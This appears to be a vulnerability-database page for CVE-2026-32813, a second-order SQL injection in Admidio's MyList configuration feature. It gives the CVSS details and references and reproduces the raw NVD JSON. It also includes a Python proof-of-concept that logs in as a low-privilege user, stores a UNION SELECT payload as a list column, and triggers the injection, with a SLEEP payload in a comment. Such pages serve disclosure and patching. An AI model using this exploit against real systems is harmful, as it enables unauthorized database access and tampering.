CVE-2026-32813

Description

Admidio is an open-source user management solution. Versions 5.0.6 and below are vulnerable to arbitrary SQL Injection through the MyList configuration feature. The MyList configuration feature lets authenticated users define custom list column layouts, storing user-supplied column names, sort directions, and filter conditions in the adm_list_columns table via prepared statements. However, these stored values are later read back and interpolated directly into dynamically constructed SQL queries without sanitization or parameterization, creating a classic second-order SQL injection vulnerability (safe write, unsafe read). An attacker can exploit this to inject arbitrary SQL, potentially reading, modifying, or deleting any data in the database and achieving full database compromise. This issue has been fixed in version 5.0.7.

CVSS Details

CVSS Score

8.0

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:admidio:admidio:*:*:*:*:*:*:*:* - VULNERABLE

Admidio <= 5.0.6

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target configuration
target_url = "http://example.com/admidio"
login_url = f"{target_url}/adm_program/system/login.php"
list_url = f"{target_url}/adm_program/modules/lists/mylist_function.php"

# Attacker credentials (low privilege user)
credentials = {
    "usr_login_name": "attacker",
    "usr_password": "password"
}

session = requests.Session()

# Step 1: Authenticate
print("[*] Logging in...")
login_resp = session.post(login_url, data=credentials)
if login_resp.status_code != 200:
    print("[-] Login failed")
    exit()

# Step 2: Inject payload via MyList configuration
# The payload targets a column name that will be concatenated into SQL later
# Example Payload: ' OR SLEEP(5)-- 
sql_payload = "test' UNION SELECT 1,2,3,4,5,6,7,8,9-- -"

print("[*] Sending malicious payload to MyList configuration...")
exploit_data = {
    "mode": "save",
    "lst_id": "1",
    "columns[]": [sql_payload],  # Injecting into the column definition
    "sort": "ASC"
}

store_resp = session.post(list_url, data=exploit_data)

# Step 3: Trigger the vulnerability
# Accessing the list page forces the app to read the stored config and build the SQL
print("[*] Triggering the vulnerability by accessing the list...")
trigger_resp = session.get(f"{target_url}/adm_program/modules/lists/lists_show.php?lst_id=1")

if trigger_resp.status_code == 200:
    print("[+] Request sent. Check database for execution of payload.")
else:
    print("[-] Trigger failed")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-32813
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-32813
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-32813/
[4] VulDB https://vuldb.com/cve/CVE-2026-32813
[5] https://github.com/Admidio/admidio/commit/3473bf5a7aa1bfc5043e73979719396276f4189f
[6] https://github.com/Admidio/admidio/security/advisories/GHSA-3x67-4c2c-w45m
[7] https://github.com/Admidio/admidio/security/advisories/GHSA-3x67-4c2c-w45m

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-32813", "sourceIdentifier": "[email protected]", "published": "2026-03-20T02:16:35.210", "lastModified": "2026-03-23T15:25:42.963", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Admidio is an open-source user management solution. Versions 5.0.6 and below are vulnerable to arbitrary SQL Injection through the MyList configuration feature. The MyList configuration feature lets authenticated users define custom list column layouts, storing user-supplied column names, sort directions, and filter conditions in the adm_list_columns table via prepared statements. However, these stored values are later read back and interpolated directly into dynamically constructed SQL queries without sanitization or parameterization, creating a classic second-order SQL injection vulnerability (safe write, unsafe read). An attacker can exploit this to inject arbitrary SQL, potentially reading, modifying, or deleting any data in the database and achieving full database compromise. This issue has been fixed in version 5.0.7."}, {"lang": "es", "value": "Admidio es una solución de gestión de usuarios de código abierto. Las versiones 5.0.6 e inferiores son vulnerables a inyección SQL arbitraria a través de la característica de configuración MyList. La característica de configuración MyList permite a los usuarios autenticados definir diseños de columnas de lista personalizados, almacenando nombres de columna, direcciones de ordenación y condiciones de filtro proporcionados por el usuario en la tabla adm_list_columns a través de sentencias preparadas. Sin embargo, estos valores almacenados se leen posteriormente y se interpolan directamente en consultas SQL construidas dinámicamente sin sanitización ni parametrización, creando una vulnerabilidad de inyección SQL de segundo orden clásica (escritura segura, lectura insegura). Un atacante puede explotar esto para inyectar SQL arbitrario, potencialmente leyendo, modificando o eliminando cualquier dato en la base de datos y logrando un compromiso total de la base de datos. Este problema ha sido corregido en la versión 5.0.7."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.0, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.1, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:admidio:admidio:*:*:*:*:*:*:*:*", "versionEndExcluding": "5.0.7", "matchCriteriaId": "3347E657-D132-4D87-A355-391136657A27"}]}]}], "references": [{"url": "https://github.com/Admidio/admidio/commit/3473bf5a7aa1bfc5043e73979719396276f4189f", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/Admidio/admidio/security/advisories/GHSA-3x67-4c2c-w45m", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}, {"url": "https://github.com/Admidio/admidio/security/advisories/GHSA-3x67-4c2c-w45m", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}